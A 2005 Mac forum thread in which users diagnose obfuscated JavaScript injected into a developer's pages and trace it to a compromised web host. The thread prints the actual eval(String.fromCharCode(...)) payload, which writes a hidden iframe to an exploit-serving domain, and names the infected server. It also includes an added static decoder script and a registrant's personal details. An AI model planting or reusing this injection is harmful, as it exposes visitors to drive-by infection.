Do I have a real virus? Oh geezus...


jvaska
Mar 4, 2005, 04:09 AM
Years ago there was a famous virus that had something to do with http://padonack.info...

When I'm surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain html pages that have no includes or anything. I'm a web dev since '95 so I know a few things...but I can't explain this yet.

Except, that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).

I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).

Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...

Anybody else ever see something like this on their end?

Mitthrawnuruodo
Mar 4, 2005, 04:34 AM
I'm sorry, but I have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an adservice (or whatever), JavaScript does not insert itself into pages...

If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...

jvaska
Mar 4, 2005, 04:48 AM
> I'm sorry, but I have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an adservice (or whatever), JavaScript does not insert itself into pages...
>
> If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...

Sorry, I'm freaking out here...

I'm on OSX 10.3.7 using Safari 1.2.4...

My Apache is not configured to add anything. My AdBlock has never posed any problems of any sort...

My webhost claims it's me...and from what I can determine, the problem is coming from my end of things (since others are not experiencing the problem while visiting my site).

Is it possible that the router could be doing this? I don't know much about them...

Trying to figure this out...is there a way with Apple Firewall to block outgoing communications with a particular ip address? I can't find this...

jvaska
Mar 4, 2005, 05:07 AM
I'm surfing with Adblock.css and my plugins turned off and it's still happening. And with Firefox too...

This is not good...

<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script>

which spells out "document.write('');"

It does this on static html pages too...

broken_keyboard
Mar 4, 2005, 05:46 AM
From what I can see it will execute the following:

document.write('<iframe height=1 width=1 src=http://padonak.info/fa/></iframe>

Searching the web, it seems that site may contain a jar file that uses a JVM exploit to compromise your machine.
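The script quoted above, decoded without running it. This is an added example, not code from the thread: the character codes are the ones jvaska posted (with the forum's line-wrap spaces removed), while the function names and the regular expressions are my own. It pulls the numeric list out of `String.fromCharCode(...)`, turns it back into text, and then reports any iframe the text would write and whether that iframe is sized to be invisible. Nothing is passed to `eval`, so it is safe to run on any page source in Node or a browser console.

```javascript
// Added example, not code from the thread: decode eval(String.fromCharCode(...))
// payloads statically so a defender can see where the hidden iframe points.

// Constructed sample: the injected line as quoted in the thread.
const SAMPLE_SCRIPT =
  "<script language=javascript>eval(String.fromCharCode(" +
  "100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114," +
  "97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32," +
  "115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110," +
  "102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script>";

// Find every String.fromCharCode(...) call whose arguments are a literal list
// of numbers and decode it. A non-numeric argument is reported, not guessed.
function decodeFromCharCode(script) {
  const call = /String\.fromCharCode\(\s*([\d\s,]+)\)/g;
  const decoded = [];
  let m;
  while ((m = call.exec(script)) !== null) {
    const codes = m[1]
      .split(",")
      .map((s) => s.trim())
      .filter((s) => s !== "")
      .map(Number);
    if (codes.some((c) => !Number.isInteger(c) || c < 0 || c > 0xffff)) {
      throw new Error("unexpected char code in " + m[0]);
    }
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Pull iframe src values out of decoded HTML and note whether the frame is
// sized to be invisible (the 1x1 frame seen in the thread).
function findIframes(html) {
  const tag = /<iframe\b([^>]*)>/gi;
  const frames = [];
  let m;
  while ((m = tag.exec(html)) !== null) {
    const attrs = m[1];
    const src = /\bsrc\s*=\s*["']?([^\s"'>]+)/i.exec(attrs);
    const h = /\bheight\s*=\s*["']?(\d+)/i.exec(attrs);
    const w = /\bwidth\s*=\s*["']?(\d+)/i.exec(attrs);
    frames.push({
      src: src ? src[1] : null,
      hidden: Boolean(h && w && Number(h[1]) <= 1 && Number(w[1]) <= 1),
    });
  }
  return frames;
}

// Whole pipeline: obfuscated script in, decoded text and iframe list out.
function analyzeInjectedScript(script) {
  const decoded = decodeFromCharCode(script);
  const iframes = decoded.flatMap(findIframes);
  return { decoded, iframes };
}

console.log(JSON.stringify(analyzeInjectedScript(SAMPLE_SCRIPT), null, 2));
```

Run against the sample, `decoded[0]` is `document.write('<iframe height=1 width=1 src=http://padonak.info/fa/ ></iframe>');` and the single iframe is reported as hidden with `src` `http://padonak.info/fa/`, which is exactly what broken_keyboard worked out by hand.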

jvaska
Mar 4, 2005, 05:51 AM
Yes, that's why I'm pretty freaked out by this... If you search on padonak and hangup you'll find more info...

I'm trying to get the webhost to dig deeper into the matter but yesterday they flat out said it's me, not them.

Actually, if there are any mac people out there who might be able to take a look at this - just to see if they can get the same javascript code that I'm getting perhaps they could IM me?

Thanks...

Applespider
Mar 4, 2005, 06:24 AM
I'm on my work PC at the moment but did find some info about recent padonak attacks that you (or others) might find useful. It appears that its payload is Windows specific but that on some PCs it was getting round Norton etc

This seems to be the most common explanation - not sure if it triggers anything with you. Most people say that it ended up being installed onto their webserver, particularly when they ran forum software. Posting comments on the folder led to the malicious include.

We were maliciously attacked from a padonak.info website that uses IFRAME to download the "proc.jar java. archive and run MainApp.class This, again through IFRAME, loads other classes which contain JavaByteVerify exploit.


http://msmvps.com/donna/archive/2004/07/03/9463.aspx

Good luck

Mitthrawnuruodo
Mar 4, 2005, 06:25 AM
From this site (http://msmvps.com/donna/archive/2004/07/03/9463.aspx):

> The gaming website I admin for was hit last week with a padonak.info object. Although at first glance it allowed the JavaByteVerify to enter. It also allowed a backdoor trojan to come in and infect any computer not well guard with an anti virus program/firewall. One person found it got around his Norton, router AND his Black Ice to try leaving a "Bloodhound .6 worm exploit. With another, it dropped in a "Trojan.Win32.Paketes"
>
> The padonak.info object installs on the taskbar and if you click on it, it will disable the ActiveX preventing the page from working properly. But it allows other nasty buggers to get in too.
>
> I have been combing the web since this attack on Dec 22 and could not find anything under "padonak.info". Finally went to Wilders Security forums where a "padobot" and Russian "HangUp" hacker group were mentioned back in October. Then a Google search using the HangUp name.

Sounds very much like a Windows problem, first and foremost... how it can affect a Mac is beyond me, even more after skimming through this forum (http://www.wilderssecurity.com/showthread.php?t=13039&page=3)...

Maybe this is a good time to actually run Virex or another AV software and see what they find... ;) ...or ask if your Webservice runs on a PC...?

redeye be
Mar 4, 2005, 06:28 AM
You could always call this guy and ask him what's up
Domain Name: PADONAK.INFO
Registrant Name: Jester Norman
Registrant Organization: SplitInfinity
Registrant Street1: 13553 Poway Rd.
Registrant City: San Diego
Registrant State/Province: CA
Registrant Postal Code: 92064
Registrant Country: US
Registrant Phone: +1.8586792814

if it is a virus you would make the history books! Wouldn't that be great? :o

Good luck.

jvaska
Mar 4, 2005, 06:30 AM
> This seems to be the most common explanation - not sure if it triggers anything with you. Most people say that it ended up being installed onto their webserver, particularly when they ran forum software. Posting comments on the folder led to the malicious include.

Yep...the problem I have is that it's interfering with my css for whatever reason. I can see the iframe loading onto the page as it's leaving a little space...

I don't have any kind of system for people to insert comments, etc onto my site...I'm not running a blog...

So, do I breathe a little easier thinking that it's something server-side and not me? I hope so...I don't want to be the first...

Thanks...

Mitthrawnuruodo
Mar 4, 2005, 06:31 AM
By the way: What is the address to your site? It would be interesting to see first hand...

jvaska
Mar 4, 2005, 06:33 AM
> By the way: What is the address to your site? It would be interesting to see first hand...

I really don't like putting my url into forums...IM me on ichat and I'll give you the link...

Mitthrawnuruodo
Mar 4, 2005, 06:46 AM
> I really don't like putting my url into forums...IM me on ichat and I'll give you the link...vvvaska...

I don't really get that, why have a secret homepage...? :rolleyes:

But, anyhow, what I really want to know is the system your page is running on... Can you run your homepage through Whats that site running? (http://uptime.netcraft.com/up/graph/) (it needs the whole URL, including the http://)...?

My site (http://www.geek.no/), according to this test runs on Linux, with a Apache/2.0.51 (Debian GNU/Linux) DAV/2 FrontPage/5.0.2.2635 PHP/4.3.8-12 mod_ssl/2.0.51 OpenSSL/0.9.7d webserver which is owned by Dataguard AS

Now if your webhost runs on a OS in the Windows family and maybe even an IIS server then we have a very strong suspect, and your machine is most likely as healthy as ever... ;)

jvaska
Mar 4, 2005, 07:10 AM
It's not secret, I just don't want to post it in a forum. I never do...

Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a

Mitthrawnuruodo
Mar 4, 2005, 07:27 AM
> It's not secret, I just don't want to post it in a forum. I never do...
>
> Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a

Fair enough... ;)

Hmmm... quite a little problem this... have you tried a search for a proc.jar file...?

And, what happens if you make a REALLY simple html file and upload that... does that too suddenly appear to have a foreign iframe in it...?

jvaska
Mar 4, 2005, 07:32 AM
> Hmmm... quite a little problem this... have you tried a search for a proc.jar file...?
>
> And, what happens if you make a REALLY simple html file and upload that... does that too suddenly appear to have a foreign iframe in it...?

Don't have proc.jar on my system (or search doesn't find it)...very simple html files do have the iframe...

Normally, my support is very fast. They are clearly thinking this one over before they get back to me. Fingers crossed they find the culprit...

Thanks, v

Mitthrawnuruodo
Mar 4, 2005, 07:38 AM
> Don't have proc.jar on my system (or search doesn't find it)...very simple html files do have the iframe...
>
> Normally, my support is very fast. They are clearly thinking this one over before they get back to me. Fingers crossed they find the culprit...
>
> Thanks, v

Well if it didn't have an iframe when you view it through localhost at your own machine and therefore has to be clean when leaving your machine, then it's most likely something that gets added by your webhost's server...

Mitthrawnuruodo
Mar 4, 2005, 07:56 AM
Ok, here's an idea: Make a simple, but typical html page, with a likewise simple css file. E-mail them to me at einstein<at>c2i<dot>net with a specific Subject (that's my "spam"-account so most incoming mail from unknowns will be caught by the junk filter) and I'll upload them on my site and post back the link, if that's clean and your webhost still claims it's you, you can give them that link and say: Why isn't the iframe/script added when my file is uploaded here, then...???

jvaska
Mar 4, 2005, 08:18 AM
Confirmed...this is a local issue...trying to go forward from here...

Hope this is not a virus...

It's affecting Safari and Firefox...not IE...

MisterMe
Mar 4, 2005, 08:29 AM
> Years ago there was a famous virus that had something to do with http://padonack.info...
>
> When I'm surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain html pages that have no includes or anything. I'm a web dev since '95 so I know a few things...but I can't explain this yet.
>
> Except, that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).
>
> I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).
>
> Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...
>
> Anybody else ever see something like this on their end?

You do not have a virus. If you did, you would be the first MacOS X user to get one. The only way for that to happen is for you to have written it, which you did not. At any rate, I don't entirely understand the nature of your problem. However, in the last couple of weeks, I have heard of ISPs inserting pop-ups between websites and surfers without the cooperation of the websites. If your site is hosted on your local computer, you can disconnect your computer from the 'net to see if the mysterious code disappears.

jvaska
Mar 4, 2005, 08:30 AM
The same problem is on my two machines...I hate to say this...but is it?

I'm not sure what to do right now. Should I just backup and reinstall?

Oh geezus...

jvaska
Mar 4, 2005, 08:32 AM
> You do not have a virus. If you did, you would be the first MacOS X user to get one. The only way for that to happen is for you to have written it, which you did not. At any rate, I don't entirely understand the nature of your problem. However, in the last couple of weeks, I have heard of ISPs inserting pop-ups between websites and surfers without the cooperation of the websites. If your site is hosted on your local computer, you can disconnect your computer from the 'net to see if the mysterious code disappears.

Site is not hosted locally...

Would a host insert javascript that clearly drives to a documented hack site?

Nobody can reproduce this. PC's and Mac's now...nobody else has this except for me. On two machines in my network...

Mitthrawnuruodo
Mar 4, 2005, 08:38 AM
Let's see if we can't find the problem (if it really is local, which I strongly doubt, have you checked your ISP...?):
Do you have any "funny" plugins/addons/extensions that you use, either installed directly in your browser (like the Adblock extension in Firefox) or something in your home folder ~/Library/Internet Plug-Ins or systemwide /Library/Internet Plug-Ins ?

Mitthrawnuruodo
Mar 4, 2005, 08:41 AM
> Would a host insert javascript that clearly drives to a documented hack site?

Some (free) hosts add a script (or some sort of frame) to all pages making them display ads...

jvaska
Mar 4, 2005, 08:44 AM
> Some (free) hosts add a script (or some sort of frame) to all pages making them display ads...

My host is not of that caliber...they wouldn't do that...

jvaska
Mar 4, 2005, 08:49 AM
> Let's see if we can't find the problem (if it really is local, which I strongly doubt, have you checked your ISP...?):
> Do you have any "funny" plugins/addons/extensions that you use, either installed directly in your browser (like the Adblock extension in Firefox) or something in your home folder ~/Library/Internet Plug-Ins or systemwide /Library/Internet Plug-Ins ?

Adblock is a css file...it still happens when that is turned off...I had a pdf reader plugin but the problem still happens when I take it out of the folder...

A friend who does some mac tech has told me to start looking for invisible files...and dump some user preferences...

but why on both of my computers? they run via the same hub but i rarely actually share files between the two...

redeye be
Mar 4, 2005, 08:57 AM
Just a thought, do you use a proxy server?

Mitthrawnuruodo
Mar 4, 2005, 09:03 AM
> Adblock is a css file...it still happens when that is turned off...I had a pdf reader plugin but the problem still happens when I take it out of the folder...
>
> A friend who does some mac tech has told me to start looking for invisible files...and dump some user preferences...
>
> but why on both of my computers? they run via the same hub but i rarely actually share files between the two...

I'm not looking for your css file... I'm talking about an Extension in Firefox called Adblock, that is a jar file located in ~/Library/Application Support/Firefox/Profiles/default.xxx/extensions/{<lots of rubbish>}/chrome/

If you have installed some additions/extensions to Firefox, they are all jar files (which in this case all could be suspects), and are installed in that extensions folder. (Plug-ins go in the above mentioned folders.) If you have stuff in the extension folder that you don't know what is, delete them (which is good advice no matter what ;)).

But I think the next suspect might be your ISP, as MisterMe said they might also have some sort of ad scheme that hackers might have taken control over...

jvaska
Mar 4, 2005, 09:05 AM
> Just a thought, do you use a proxy server?

Oh gosh, I can't remember anymore. No, I don't have one set in OSX but who knows what my router or isp have going on. Those things are mystery to me...

redeye be
Mar 4, 2005, 09:15 AM
> No, I don't have one set in OSX but who knows what my router or isp have going on.

Surf to http://www.whatismyip.com/
compare the ip you get there with the external ip of your router. If they're different u are using a proxy (can this be confirmed :o ).

jvaska
Mar 4, 2005, 09:19 AM
> Surf to http://www.whatismyip.com/
> compare the ip you get there with the external ip of your router. If they're different u are using a proxy (can this be confirmed :o ).

Well, internally it's reported as 10.0.0.11 and externally at whatismyisp it's 83.134...etc...

Mitthrawnuruodo
Mar 4, 2005, 09:50 AM
The router has one IP that is used to identify it on the internet, in this case the 83.-address, then it gives out internal IP numbers, using DNS to all local machines connected (your local LAN), using local addresses, in this case 10.-addresses (or in other LANs 192.168.-addresses), or you can set those yourself, but if your Router is 10.0.0.1, you'll have to use a 10.-address. This has nothing to do with Proxy servers.

jvaska
Mar 4, 2005, 10:38 AM
> The router has one IP that is used to identify it on the internet, in this case the 83.-address, then it gives out internal IP numbers, using DNS to all local machines connected (your local LAN), using local addresses, in this case 10.-addresses (or in other LANs 192.168.-addresses), or you can set those yourself, but if your Router is 10.0.0.1, you'll have to use a 10.-address. This has nothing to do with Proxy servers.

I understand that, but how is that going to help me try to deal with this problem? This is not looking good...

Mitthrawnuruodo
Mar 4, 2005, 10:57 AM
> I understand that, but how is that going to help me try to deal with this problem? This is not looking good...

I was just trying to point that out, that the IP approach probably wouldn't get you anywhere...

Have you checked with your ISP? That's the best place to look, since both your machines are affected the same way... and noone else has any problems...

Also there's a couple of things that's bothering me:
> When I'm surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document

> the problem I have is that it's interfering with my css for whatever reason

If it's only when you're surfing on your own site then it has to be something on those pages... right...? And how, exactly, is it interfering with your css...?

redeye be
Mar 4, 2005, 11:16 AM
proxy's are able to change the contents of a page.
if you get the same iframe on other pages as well it is definitely worth checking it out.

the ip you got from the whatismyip is the one you should compare with the external address of the router. the 10.... is indeed an internal one distributed via DHCP by the router. The router also has an external address (which you probably can find out by simply entering its internal ip in a browser window). Like i said it is this address you need to compare.

jvaska
Mar 4, 2005, 11:16 AM
Valid questions...

Yes, it only happens when I'm surfing my own site - or the server that my site is on. To test this out I've created simple html files without any includes or anything and it still happens. The mysterious script only appears 30% of the time...

I can tell it's there because I can see the iframe...and sometimes it will affect my css by making the text large.

I asked the host to go through things and they can't reproduce the problem. I can't find anybody who can reproduce the problem.

Actually, it could possibly be an ISP issue. We have some weird service. Periodically my site, and a few others just stop working. I can't access them...but others can. It's rather rare.

I guess I could venture that the ISP has been hacked...but in the same way that it's bizarre that my site sometimes has local outages it's equally weird that only my site gets the mysterious script.

I did try a few other proxy servers and sometimes the script still appeared.

I'm not sure what to call this...a virus...an ISP issue...whatever it is I'm not sure what to do next. I'm not sure if reinstalling the OS would work. I would call the ISP but this is Belgium...we would get nowhere with that.

Sigh...

Thanks for helping out... ;)

jeremy.king
Mar 4, 2005, 12:33 PM
Telnet to your domain name on port 80 and then issue a GET request for your test page.

This will return the source code to you. If you see the iframe code, then your web host has a problem. If not...well....

Since you don't see it everytime, make sure to try several times.

It would definitely help us help you if you published your URL.

jvaska
Mar 4, 2005, 02:56 PM
> Telnet to your domain name on port 80 and then issue a GET request for your test page.
>
> This will return the source code to you. If you see the iframe code, then your web host has a problem. If not...well....
>
> Since you don't see it everytime, make sure to try several times.
>
> It would definitely help us help you if you published your URL.

This is a test url page...basic html...nothing more...

http://www.vaska.com/test/

I appreciate all the help people...v

Mitthrawnuruodo
Mar 4, 2005, 03:16 PM
Well we can rule out your ISP, and if that file was "clean" when leaving your computer, it's back to your webhost...

Came up on first try, and since it's added to the top of the file I really suspect something added server side...

dotdotdot
Mar 4, 2005, 03:27 PM
It came up once for me and I am 99% sure it had to do w/ me being on Windows but the second it fully loaded I needed to reboot - firefox froze up and internet went down...

jeremy.king
Mar 4, 2005, 04:09 PM
Its your WEB HOST

I went to http://server145.ezbudgethosting.com (machine where your site is hosted, BTW)

Up came our friend - notice the first line in the source.


<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script><HTML>
<HEAD>
<TITLE>cPanel</TITLE>
<link href="sys_cpanel/css/style.cssx" rel="stylesheet" type="text/css">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<style>
body { font-family: verdana, arial, helvetica, sans-serif; font-size: 11px; background-color:#367E8E; scrollbar-base-color: #005B70; scrollbar-arrow-color: #F3960B; scrollbar-DarkShadow-Color: #000000; }
a { color:#ffffff; text-decoration:none }
</style>
</HEAD>
<BODY leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr valign="top">
<td height="75" nowrap valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="10%"><a href="http://www.cpanel.net"><img src="sys_cpanel/images/index_01.gif" width="126" height="46" alt="cPanel" border=0></a></td>

<td width="27%"><img src="sys_cpanel/images/index_02.gif" width="343" height="46"></td>
<td width="1%" background="sys_cpanel/images/index_04.gif"><img src="sys_cpanel/images/index_04.gif" width="43" height="46"></td>
<td width="62%" align="right" background="sys_cpanel/images/index_04.gif"><img src="sys_cpanel/images/index_03.gif" width="138" height="46"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td valign="top">

<div style="color:ff9900; font-weight:bold; font-size:24pt; text-align:center">There is no website configured at this address.</div><br>
<br>
<div style="color:ffffff">
You are seeing this page because there is nothing configured for the site you have requested. If you think you are seeing this page in error, please contact the site administrator or datacenter responsible for this site.<br>
</div></td></tr>
<tr><td valign="bottom">
<table width=100%>
<tr><td>
<div style="color:ff9900; font-weight:bold">About cPanel:</div><br>
<div style="color:ffffff">cPanel is a leading provider of software for the webhosting industry. If you would like to learn more about cPanel please visit our website at <a class=josh href="http://www.cpanel.net/">http://www.cpanel.net/</a>. Please be advised that cPanel is not a webhosting company itself, and as such is not responsible for content found elsewhere on this site.</div>
</tr>

</table>
</td>
</tr>
<tr>
<td height="10">
<table width="100%" border="0" cellspacing="0" cellpadding="0" background="sys_cpanel/images/bbg.gif">
<tr align="center">
<td background="sys_cpanel/images/bbg.gif"><img src="sys_cpanel/images/bbg.gif" width="179" height="22"></td>
<td background="sys_cpanel/images/bbg.gif"><img src="sys_cpanel/images/bottom_label.gif" width="382" height="22"></td>
<td background="sys_cpanel/images/bbg.gif"><img src="sys_cpanel/images/bbg.gif" width="179" height="22"></td>
</tr>

</table>
</td>
</tr>
</table>
<!--- REVISION: 1.2 --->
</BODY>
</HTML>

Mitthrawnuruodo
Mar 4, 2005, 04:21 PM
> Its your WEB HOST
>
> I went to http://server145.ezbudgethosting.com (machine where your site is hosted, BTW)
>
> Up came our friend - notice the first line in the source.

Nice catch... I think we have a winner...!

jvaska, if your webhost doubts it just give them a link to that... and give 'em a good yelling for letting us run through hoops all day for nothing, as they were the initial suspects... ;)

jackieonasses
Mar 4, 2005, 04:40 PM
wow us MacRumors guys... (and girls) we really know how to solve that stuff! Mad props!


kyle

skipperchong
Mar 4, 2005, 06:56 PM
no joke. great job, peeps. getting all encyclopedia brown and stuff.

redeye be
Mar 5, 2005, 02:42 AM
> Its your WEB HOST
>
> I went to http://server145.ezbudgethosting.com (machine where your site is hosted, BTW)

OMG, just had to check this out. Firefox just quit on me :eek:
running 1.0.1 on 10.3.8

nice troubleshooting,
good luck jvaska

jvaska
Mar 5, 2005, 02:54 AM
WOW!!! What's weird is I had others try it and it just wouldn't come up...maybe it only comes up on Mac's? But I had tried other macs...

Well, if they can't nab the virus then I'll ask to be moved to another server. But these guys have always been very professional (I've been with them for a couple years). I'm sure they will read this and get back in there and take care of things.

Relieved...thanks for all the help...v

irmongoose
Mar 5, 2005, 03:00 AM
I used Safari to access the page. It started to download a file called "object.cfm".

The code in the file is really long... too long to post here.

irmongoose
jvaska
Mar 5, 2005, 03:58 AM
> I used Safari to access the page. It started to download a file called "object.cfm".
>
> The code in the file is really long... too long to post here.
> irmongoose

Oh geezus...that happened to me yesterday but I couldn't figure out where it came from. I just deleted it when it appeared...

Wow...proof of concept there that hackers can at least auto download a file to your computer while using Safari.

gekko513
Mar 5, 2005, 05:34 AM
> Oh geezus...that happened to me yesterday but I couldn't figure out where it came from. I just deleted it when it appeared...
>
> Wow...proof of concept there that hackers can at least auto download a file to your computer while using Safari.

I get the object.cfm file in Safari, too. But I don't think the auto download should be considered a new proof of concept since versiontracker among others use a similar approach when you download anything through them.

jvaska
Mar 5, 2005, 05:42 AM
> I get the object.cfm file in Safari, too. But I don't think the auto download should be considered a new proof of concept since versiontracker among others use a similar approach when you download anything through them.

Probably. I'm in new waters here...everything I say should be taken as a newbie worrying about what's going on here. ;)

AlexSpark
Mar 5, 2005, 07:55 AM
cfm = coldfusion

i really really wouldnt worry about a coldfusion file

jeremy.king
Mar 5, 2005, 09:07 AM
> no joke. great job, peeps. getting all encyclopedia brown and stuff.

Some of my favorite books to read as a kid :D

Cybernanga
Mar 5, 2005, 11:53 AM
It took a couple of reloads in Safari, for it to show up, but it did eventually.

It auto-downloaded a file named "object.cfm"

Norton antivirus immediately gave me the following warnings

"0224653983-3385959983.cache is infected with Bloodhound.exploit.6"

followed by

"proc-.jar-438026a9-412f6e85.zip is infected but cannot be cleaned"

It quarantined both of those files.

yellow
Mar 5, 2005, 12:17 PM
> It took a couple of reloads in Safari, for it to show up, but it did eventually.
>
> It auto-downloaded a file named "object.cfm"
>
> Norton antivirus immediately gave me the following warnings
>
> "0224653983-3385959983.cache is infected with Bloodhound.exploit.6"
>
> followed by
>
> "proc-.jar-438026a9-412f6e85.zip is infected but cannot be cleaned"
>
> It quarantined both of those files.

Interestingly, Virex called it by a different name, but an infected file none-the-less..

Scanning file /Users/yellow/Desktop/Downloads/object.cfm
/Users/yellow/Desktop/Downloads/object.cfm
Found the Generic Dropper.b trojan !!!

dotdotdot
Mar 5, 2005, 02:23 PM
> cfm = coldfusion
>
> i really really wouldnt worry about a coldfusion file

Well it has a virus so...

Cybernanga
Mar 5, 2005, 05:09 PM
Jvaska, your host is infected. Get them on the phone, and make sure they do something about it.

Mac Users, while this won't attack or harm our Mac's, we can still transmit the virus to our PC brethren, so please do the responsible thing, and use an Anti-Virus to clean your mac, especially if you visited the test site mentioned in this thread.

Oh, if you use VPC, or similar, make sure you run an Anti-Virus in there as well.

gekko513
Mar 5, 2005, 05:52 PM
> Jvaska, your host is infected. Get them on the phone, and make sure they do something about it.
>
> Mac Users, while this won't attack or harm our Mac's, we can still transmit the virus to our PC brethren, so please do the responsible thing, and use an Anti-Virus to clean your mac, especially if you visited the test site mentioned in this thread.
>
> Oh, if you use VPC, or similar, make sure you run an Anti-Virus in there as well.

How would it spread from a Mac to a PC if it isn't also a Mac virus? If not it would require someone to manually mail that file to someone or share it through some file-sharing, which isn't going to happen, unless of course someone wants to hurt a Windows user on purpose. ;)

mcgarry
Mar 5, 2005, 06:00 PM
> How would it spread from a Mac to a PC if it isn't also a Mac virus? If not it would require someone to manually mail that file to someone or share it through some file-sharing, which isn't going to happen, unless of course someone wants to hurt a Windows user on purpose. ;)

A file is a file, whether or not it's a virus. A different file can do different things on different systems. Not necessarily speaking of this particular case, the Mac itself cannot become infected, but could pass along files that could infect others. Apparently inadvertent transfers do happen.

The currently available crop of Mac anti-virus programs basically police such transfers, since they have nothing as of yet from which to protect the Mac itself.

jvaska
Mar 6, 2005, 02:15 AM
I'll contain my comments for the moment...

gekko513
Mar 6, 2005, 07:34 AM
> A file is a file, whether or not it's a virus. A different file can do different things on different systems. Not necessarily speaking of this particular case, the Mac itself cannot become infected, but could pass along files that could infect others. Apparently inadvertent transfers do happen.
>
> The currently available crop of Mac anti-virus programs basically police such transfers, since they have nothing as of yet from which to protect the Mac itself.

How would the file pass itself on to a Windows host? It's not like my (randomly picked) com.elgato.eyetv.plist file in my Library suddenly shows up on my brother's Windows PC, is it?

If it does have a mechanism to automatically spread from a Mac, it must be considered to be a Mac virus, too.

I appreciate the better safe than sorry thinking, but I really don't think it is necessary to install anti-virus just for this file. I think there are other valid reasons to install anti-virus on a Mac, but this file isn't one of them, unless, like I said, it is a Mac virus, also.

jvaska
Mar 6, 2005, 11:49 AM
There is a conclusion to this story. After we went back and forth looking at the problem it was realized that the old server needed to be seriously looked at (I'm assuming they will give it an overhaul). In two years this is the first time something like this has happened with my host.

Today, we decided we'd just move me to a new server to get it over with quickly. Done.

I do want to add, that while at times the tech support could have been a little more on the ball, once the powers that be at Jiffynet (http://www.jiffynet.net/) caught wind of all of this they took action very quickly. ;)

Cybernanga
Mar 30, 2005, 01:34 AM
How would the file pass itself on to a Windows host? It's not like my (randomly picked) com.elgato.eyetv.plist file in my Library suddenly shows up on my brother's Windows PC, is it?

If it does have a mechanism to automatically spread from a Mac, it must be considered to be a Mac virus, too.

I appreciate the better safe than sorry thinking, but I really don't think it is necessary to install anti-virus just for this file. I think there are other valid reasons to install anti-virus on a Mac, but this file isn't one of them, unless, like I said, it is a Mac virus, also.

If a windows user sends me an infected file, the virus can't do anything while it's on my mac, because the virus's code doesn't tell it how to behave on a mac, but the virus code is still in the file, so if I then send this same file to an uninfected windows user, the virus would still be able to infect their machine, because it is now in an environment where it knows how to behave.

Having anti-virus software on my mac will help prevent the virus from spreading. This is polite behaviour especially if you connect to windows networks, or send email attachments back and forth between different windows users.

Mitthrawnuruodo
Mar 30, 2005, 02:04 AM
If a windows user sends me an infected file, the virus can't do anything while it's on my mac, because the virus's code doesn't tell it how to behave on a mac, but the virus code is still in the file, so if I then send this same file to an uninfected windows user, the virus would still be able to infect their machine, because it is now in an environment where it knows how to behave.

Having anti-virus software on my mac will help prevent the virus from spreading. This is polite behaviour especially if you connect to windows networks, or send email attachments back and forth between different windows users.

How will the virus spread if you connect to a windows network? You have to physically move the file yourself. And why would you forward an e-mail containing a virus (it's not like you need an anti-virus program to spot them)? That doesn't make any sense...

wdlove
Apr 1, 2005, 07:46 PM
I believe this is a first for me. Can someone alleviate my fear?

++++++++++++++++++++++++++++++++++++++
VIRUS BLOCKER MESSAGE STATUS
++++++++++++++++++++++++++++++++++++++

+ Virus successfully cleaned out of attachment(s):
No attachments are in this category.

+ Attachment(s) deleted due to virus:
1. Doll.zip: W32.Beagle@mm!zip


+++++++++++++++++++
Powered by Symantec
+++++++++++++++++++

++++++++++++++++++++++++++++++++++++++
VIRUS BLOCKER MESSAGE STATUS
++++++++++++++++++++++++++++++++++++++

+ Virus successfully cleaned out of attachment(s):
No attachments are in this category.

+ Attachment(s) deleted due to virus:
1. Cool_MP3.zip: W32.Beagle@mm!zip


+++++++++++++++++++
Powered by Symantec
+++++++++++++++++++

Agathon
Apr 1, 2005, 08:03 PM
It's a win32 virus.

It cannot harm your mac.

Don't worry, there are still no OS X viruses.

spacepower7
Apr 1, 2005, 11:22 PM
As I started reading this thread, I decided to run Norton AV, first time in 6 months. When I got to page 3 of this thread Norton AV was half thru scanning my hard drive, then Norton gave me a nice kernel panic :eek:

